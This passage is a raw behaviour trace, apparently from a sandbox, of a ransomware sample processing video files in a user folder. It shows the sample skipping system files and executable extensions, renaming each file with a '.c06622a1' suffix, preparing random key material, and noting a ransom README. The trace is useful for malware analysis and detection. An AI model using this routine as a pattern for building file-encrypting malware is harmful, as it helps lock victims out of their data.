_Str2="avi") returned 1 [0156.910] wcslen (_String="bat") returned 0x3 [0156.910] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.910] wcslen (_String="bin") returned 0x3 [0156.910] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.910] wcslen (_String="cab") returned 0x3 [0156.910] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.910] wcslen (_String="cmd") returned 0x3 [0156.910] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.910] wcslen (_String="com") returned 0x3 [0156.910] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.910] wcslen (_String="cpl") returned 0x3 [0156.910] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.910] wcslen (_String="cur") returned 0x3 [0156.910] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.910] wcslen (_String="deskthemepack") returned 0xd [0156.910] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.910] wcslen (_String="diagcab") returned 0x7 [0156.910] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.910] wcslen (_String="diagcfg") returned 0x7 [0156.910] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.910] wcslen (_String="diagpkg") returned 0x7 [0156.910] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.910] wcslen (_String="dll") returned 0x3 [0156.910] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.910] wcslen (_String="drv") returned 0x3 [0156.910] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.910] wcslen (_String="exe") returned 0x3 [0156.910] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.910] wcslen (_String="hlp") returned 0x3 [0156.910] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.910] wcslen (_String="icl") returned 0x3 [0156.911] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.911] wcslen (_String="icns") returned 0x4 [0156.911] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.911] wcslen (_String="ico") returned 0x3 [0156.911] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.911] wcslen (_String="ics") returned 0x3 [0156.911] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.911] wcslen (_String="idx") returned 0x3 [0156.911] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.911] wcslen (_String="ldf") returned 0x3 [0156.911] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.911] wcslen (_String="lnk") returned 0x3 [0156.911] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.911] wcslen (_String="mod") returned 0x3 [0156.911] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.911] wcslen (_String="mpa") returned 0x3 [0156.911] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.911] wcslen (_String="msc") returned 0x3 [0156.911] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.911] wcslen (_String="msp") returned 0x3 [0156.911] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.911] wcslen (_String="msstyles") returned 0x8 [0156.911] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.911] wcslen (_String="msu") returned 0x3 [0156.911] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.911] wcslen (_String="nls") returned 0x3 [0156.911] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.911] wcslen (_String="nomedia") returned 0x7 [0156.911] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.911] wcslen (_String="ocx") returned 0x3 [0156.911] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.911] wcslen (_String="prf") returned 0x3 [0156.911] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.911] wcslen (_String="ps1") returned 0x3 [0156.911] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.911] wcslen (_String="rom") returned 0x3 [0156.911] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.911] wcslen (_String="rtp") returned 0x3 [0156.911] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.912] wcslen (_String="scr") returned 0x3 [0156.912] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.912] wcslen (_String="shs") returned 0x3 [0156.912] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.912] wcslen (_String="spl") returned 0x3 [0156.912] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.912] wcslen (_String="sys") returned 0x3 [0156.912] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.912] wcslen (_String="theme") returned 0x5 [0156.912] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.912] wcslen (_String="themepack") returned 0x9 [0156.912] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.912] wcslen (_String="wpx") returned 0x3 [0156.912] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.912] wcslen (_String="lock") returned 0x4 [0156.912] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.912] wcslen (_String="key") returned 0x3 [0156.912] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.912] wcslen (_String="hta") returned 0x3 [0156.912] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.912] wcslen (_String="msi") returned 0x3 [0156.912] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.912] wcslen (_String="pdb") returned 0x3 [0156.912] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.912] wcslen (_String="sql") returned 0x3 [0156.912] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.912] wcslen (_String="sqlite") returned 0x6 [0156.912] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai")) returned 0x10 [0156.912] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.913] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" [0156.913] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned 0x3c [0156.913] wcscpy (in: _Dest=0x450010a, _Source="Qga9EluiUyFQ9xR.avi" | out: _Dest="Qga9EluiUyFQ9xR.avi") returned="Qga9EluiUyFQ9xR.avi" [0156.913] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi", dwFileAttributes=0x80) returned 1 [0156.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\qga9eluiuyfq9xr.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0156.913] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.913] ReadFile (in: hFile=0x65c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0156.914] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xeaf5041 [0156.914] RtlComputeCrc32 (PartialCrc=0x5041, Buffer=0x3fe8f4, Length=0x80) returned 0x2a89b66c [0156.914] RtlComputeCrc32 (PartialCrc=0xb66c, Buffer=0x3fe8f4, Length=0x80) returned 0x93498f12 [0156.914] RtlComputeCrc32 (PartialCrc=0x8f12, Buffer=0x3fe8f4, Length=0x80) returned 0x4ae2eac0 [0156.914] RtlComputeCrc32 (PartialCrc=0xeac0, Buffer=0x3fe8f4, Length=0x80) returned 0x16856b5a [0156.914] CloseHandle (hObject=0x65c) returned 1 [0156.914] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.914] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi" [0156.914] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi") returned 0x50 [0156.914] wcscpy (in: _Dest=0x4510138, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.914] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\qga9eluiuyfq9xr.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\qga9eluiuyfq9xr.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\Qga9EluiUyFQ9xR.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\qga9eluiuyfq9xr.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0156.917] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.917] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f6a05c1 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x571fcd1e [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b661806 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d9f1f3 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x538a1b75 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b33c304 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x75fccdc8 [0156.922] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2be51703 [0156.925] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xd7b1ad3f [0156.925] RtlComputeCrc32 (PartialCrc=0xad3f, Buffer=0x2f30094, Length=0x80) returned 0xa3daf881 [0156.925] RtlComputeCrc32 (PartialCrc=0xf881, Buffer=0x2f30094, Length=0x80) returned 0xbf636546 [0156.925] RtlComputeCrc32 (PartialCrc=0x6546, Buffer=0x2f30094, Length=0x80) returned 0x39f9c6d4 [0156.925] RtlComputeCrc32 (PartialCrc=0xc6d4, Buffer=0x2f30094, Length=0x80) returned 0x84f6ec32 [0156.925] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0156.926] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0156.926] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0156.926] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbd5bf40, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbd5bf40, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbd5bf40, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.926] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.926] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfe0e30, ftCreationTime.dwHighDateTime=0x1d5e594, ftLastAccessTime.dwLowDateTime=0xe89888e0, ftLastAccessTime.dwHighDateTime=0x1d5e6d9, ftLastWriteTime.dwLowDateTime=0xe89888e0, ftLastWriteTime.dwHighDateTime=0x1d5e6d9, nFileSizeHigh=0x0, nFileSizeLow=0x14f46, dwReserved0=0x0, dwReserved1=0x0, cFileName="T1BEA5dZfOjosZ.flv", cAlternateFileName="T1BEA5~1.FLV")) returned 1 [0156.926] _wcsicmp (_Str1="T1BEA5dZfOjosZ.flv", _Str2="README.c06622a1.TXT") returned 2 [0156.926] wcsstr (_Str="T1BEA5dZfOjosZ.flv", _SubStr="README") returned 0x0 [0156.926] _wcsicmp (_Str1="autorun.inf", _Str2="T1BEA5dZfOjosZ.flv") returned -19 [0156.926] wcslen (_String="autorun.inf") returned 0xb [0156.926] _wcsicmp (_Str1="boot.ini", _Str2="T1BEA5dZfOjosZ.flv") returned -18 [0156.926] wcslen (_String="boot.ini") returned 0x8 [0156.926] _wcsicmp (_Str1="bootfont.bin", _Str2="T1BEA5dZfOjosZ.flv") returned -18 [0156.926] wcslen (_String="bootfont.bin") returned 0xc [0156.926] _wcsicmp (_Str1="bootsect.bak", _Str2="T1BEA5dZfOjosZ.flv") returned -18 [0156.926] wcslen (_String="bootsect.bak") returned 0xc [0156.926] _wcsicmp (_Str1="desktop.ini", _Str2="T1BEA5dZfOjosZ.flv") returned -16 [0156.926] wcslen (_String="desktop.ini") returned 0xb [0156.926] _wcsicmp (_Str1="iconcache.db", _Str2="T1BEA5dZfOjosZ.flv") returned -11 [0156.926] wcslen (_String="iconcache.db") returned 0xc [0156.926] _wcsicmp (_Str1="ntldr", _Str2="T1BEA5dZfOjosZ.flv") returned -6 [0156.926] wcslen (_String="ntldr") returned 0x5 [0156.926] _wcsicmp (_Str1="ntuser.dat", _Str2="T1BEA5dZfOjosZ.flv") returned -6 [0156.926] wcslen (_String="ntuser.dat") returned 0xa [0156.926] _wcsicmp (_Str1="ntuser.dat.log", _Str2="T1BEA5dZfOjosZ.flv") returned -6 [0156.926] wcslen (_String="ntuser.dat.log") returned 0xe [0156.926] _wcsicmp (_Str1="ntuser.ini", _Str2="T1BEA5dZfOjosZ.flv") returned -6 [0156.926] wcslen (_String="ntuser.ini") returned 0xa [0156.927] _wcsicmp (_Str1="thumbs.db", _Str2="T1BEA5dZfOjosZ.flv") returned 55 [0156.927] wcslen (_String="thumbs.db") returned 0x9 [0156.927] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0156.927] wcslen (_String="386") returned 0x3 [0156.927] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0156.927] wcslen (_String="adv") returned 0x3 [0156.927] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0156.927] wcslen (_String="ani") returned 0x3 [0156.927] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0156.927] wcslen (_String="bat") returned 0x3 [0156.927] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0156.927] wcslen (_String="bin") returned 0x3 [0156.927] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0156.927] wcslen (_String="cab") returned 0x3 [0156.927] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0156.927] wcslen (_String="cmd") returned 0x3 [0156.927] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0156.927] wcslen (_String="com") returned 0x3 [0156.927] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0156.927] wcslen (_String="cpl") returned 0x3 [0156.927] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0156.927] wcslen (_String="cur") returned 0x3 [0156.927] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0156.927] wcslen (_String="deskthemepack") returned 0xd [0156.927] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0156.927] wcslen (_String="diagcab") returned 0x7 [0156.927] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0156.927] wcslen (_String="diagcfg") returned 0x7 [0156.927] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0156.927] wcslen (_String="diagpkg") returned 0x7 [0156.927] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0156.927] wcslen (_String="dll") returned 0x3 [0156.927] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0156.927] wcslen (_String="drv") returned 0x3 [0156.927] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0156.927] wcslen (_String="exe") returned 0x3 [0156.927] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0156.927] wcslen (_String="hlp") returned 0x3 [0156.927] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0156.928] wcslen (_String="icl") returned 0x3 [0156.928] _wcsicmp (_Str1="icns", _Str2="flv") returned 3 [0156.928] wcslen (_String="icns") returned 0x4 [0156.928] _wcsicmp (_Str1="ico", _Str2="flv") returned 3 [0156.928] wcslen (_String="ico") returned 0x3 [0156.928] _wcsicmp (_Str1="ics", _Str2="flv") returned 3 [0156.928] wcslen (_String="ics") returned 0x3 [0156.928] _wcsicmp (_Str1="idx", _Str2="flv") returned 3 [0156.928] wcslen (_String="idx") returned 0x3 [0156.928] _wcsicmp (_Str1="ldf", _Str2="flv") returned 6 [0156.928] wcslen (_String="ldf") returned 0x3 [0156.928] _wcsicmp (_Str1="lnk", _Str2="flv") returned 6 [0156.928] wcslen (_String="lnk") returned 0x3 [0156.928] _wcsicmp (_Str1="mod", _Str2="flv") returned 7 [0156.928] wcslen (_String="mod") returned 0x3 [0156.928] _wcsicmp (_Str1="mpa", _Str2="flv") returned 7 [0156.928] wcslen (_String="mpa") returned 0x3 [0156.928] _wcsicmp (_Str1="msc", _Str2="flv") returned 7 [0156.928] wcslen (_String="msc") returned 0x3 [0156.928] _wcsicmp (_Str1="msp", _Str2="flv") returned 7 [0156.928] wcslen (_String="msp") returned 0x3 [0156.928] _wcsicmp (_Str1="msstyles", _Str2="flv") returned 7 [0156.928] wcslen (_String="msstyles") returned 0x8 [0156.928] _wcsicmp (_Str1="msu", _Str2="flv") returned 7 [0156.928] wcslen (_String="msu") returned 0x3 [0156.928] _wcsicmp (_Str1="nls", _Str2="flv") returned 8 [0156.928] wcslen (_String="nls") returned 0x3 [0156.928] _wcsicmp (_Str1="nomedia", _Str2="flv") returned 8 [0156.928] wcslen (_String="nomedia") returned 0x7 [0156.928] _wcsicmp (_Str1="ocx", _Str2="flv") returned 9 [0156.928] wcslen (_String="ocx") returned 0x3 [0156.928] _wcsicmp (_Str1="prf", _Str2="flv") returned 10 [0156.928] wcslen (_String="prf") returned 0x3 [0156.928] _wcsicmp (_Str1="ps1", _Str2="flv") returned 10 [0156.928] wcslen (_String="ps1") returned 0x3 [0156.928] _wcsicmp (_Str1="rom", _Str2="flv") returned 12 [0156.928] wcslen (_String="rom") returned 0x3 [0156.929] _wcsicmp (_Str1="rtp", _Str2="flv") returned 12 [0156.929] wcslen (_String="rtp") returned 0x3 [0156.929] _wcsicmp (_Str1="scr", _Str2="flv") returned 13 [0156.929] wcslen (_String="scr") returned 0x3 [0156.929] _wcsicmp (_Str1="shs", _Str2="flv") returned 13 [0156.929] wcslen (_String="shs") returned 0x3 [0156.929] _wcsicmp (_Str1="spl", _Str2="flv") returned 13 [0156.929] wcslen (_String="spl") returned 0x3 [0156.929] _wcsicmp (_Str1="sys", _Str2="flv") returned 13 [0156.929] wcslen (_String="sys") returned 0x3 [0156.929] _wcsicmp (_Str1="theme", _Str2="flv") returned 14 [0156.929] wcslen (_String="theme") returned 0x5 [0156.929] _wcsicmp (_Str1="themepack", _Str2="flv") returned 14 [0156.929] wcslen (_String="themepack") returned 0x9 [0156.929] _wcsicmp (_Str1="wpx", _Str2="flv") returned 17 [0156.929] wcslen (_String="wpx") returned 0x3 [0156.929] _wcsicmp (_Str1="lock", _Str2="flv") returned 6 [0156.929] wcslen (_String="lock") returned 0x4 [0156.929] _wcsicmp (_Str1="key", _Str2="flv") returned 5 [0156.929] wcslen (_String="key") returned 0x3 [0156.929] _wcsicmp (_Str1="hta", _Str2="flv") returned 2 [0156.929] wcslen (_String="hta") returned 0x3 [0156.929] _wcsicmp (_Str1="msi", _Str2="flv") returned 7 [0156.929] wcslen (_String="msi") returned 0x3 [0156.929] _wcsicmp (_Str1="pdb", _Str2="flv") returned 10 [0156.929] wcslen (_String="pdb") returned 0x3 [0156.929] _wcsicmp (_Str1="sql", _Str2="flv") returned 13 [0156.929] wcslen (_String="sql") returned 0x3 [0156.929] _wcsicmp (_Str1="sqlite", _Str2="flv") returned 13 [0156.929] wcslen (_String="sqlite") returned 0x6 [0156.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai")) returned 0x10 [0156.929] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0156.930] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI" [0156.930] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI") returned 0x3c [0156.930] wcscpy (in: _Dest=0x450010a, _Source="T1BEA5dZfOjosZ.flv" | out: _Dest="T1BEA5dZfOjosZ.flv") returned="T1BEA5dZfOjosZ.flv" [0156.930] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv", dwFileAttributes=0x80) returned 1 [0156.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\t1bea5dzfojosz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0156.930] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.930] ReadFile (in: hFile=0x61c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0156.931] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xd8c12e7f [0156.931] RtlComputeCrc32 (PartialCrc=0x2e7f, Buffer=0x3fe8f4, Length=0x80) returned 0x7b28dcef [0156.931] RtlComputeCrc32 (PartialCrc=0xdcef, Buffer=0x3fe8f4, Length=0x80) returned 0xb2066d59 [0156.931] RtlComputeCrc32 (PartialCrc=0x6d59, Buffer=0x3fe8f4, Length=0x80) returned 0x6eee6076 [0156.931] RtlComputeCrc32 (PartialCrc=0x6076, Buffer=0x3fe8f4, Length=0x80) returned 0x1aae9fbe [0156.931] CloseHandle (hObject=0x61c) returned 1 [0156.931] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0156.931] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv" [0156.931] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv") returned 0x4f [0156.931] wcscpy (in: _Dest=0x4510136, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.931] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\t1bea5dzfojosz.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\t1bea5dzfojosz.flv.c06622a1"), dwFlags=0x8) returned 1 [0156.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\T1BEA5dZfOjosZ.flv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\t1bea5dzfojosz.flv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0156.934] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.934] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a071c91 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x279f99c6 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x504c4a41 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3de4ed1e [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f24c6c7 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f30da32 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x77973a87 [0156.939] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x167f0c4d [0156.942] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xcad1891c [0156.942] RtlComputeCrc32 (PartialCrc=0x891c, Buffer=0x41f0094, Length=0x80) returned 0x6dc54c0 [0156.942] RtlComputeCrc32 (PartialCrc=0x54c0, Buffer=0x41f0094, Length=0x80) returned 0x4bc81b84 [0156.943] RtlComputeCrc32 (PartialCrc=0x1b84, 